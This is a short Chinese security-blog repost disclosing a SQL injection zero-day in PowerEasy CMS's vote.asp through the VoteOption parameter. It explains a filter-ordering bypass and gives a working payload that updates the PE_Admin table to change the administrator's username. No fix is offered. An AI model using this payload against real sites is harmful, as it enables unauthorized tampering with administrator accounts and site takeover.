动易27个0day之一:vote.asp注入 's

admin
admin
admin
105687
文章
88
评论
2017年4月16日03:43:05评论271 views字数 217阅读0分43秒阅读模式
摘要

by:传说中的疯子动易27个0day之一:vote.asp注入本来动易只看到了26个。
但是现在外面竟然流传了一个我没发现的,痛苦中。
竟然连这么简单的漏洞都没发现。
今天听到这个文件有问题。
拿到组件调试一下:

by:传说中的疯子

动易27个0day之一:vote.asp注入

本来动易只看到了26个。
但是现在外面竟然流传了一个我没发现的,痛苦中。
竟然连这么简单的漏洞都没发现。
今天听到这个文件有问题。
拿到组件调试一下:

以下是一些细节。
VoteOption参数注入(其他的参数就没看了)
他们先过滤了"–"再过滤";"

测试方法:
VoteOption的值为1=1 update PE_Admin set adminname=0x61-;-时,修改管理员的用户名。

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2017年4月16日03:43:05
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   动易27个0day之一:vote.asp注入 'shttps://cn-sec.com/archives/46753.html

发表评论

匿名网友 填写信息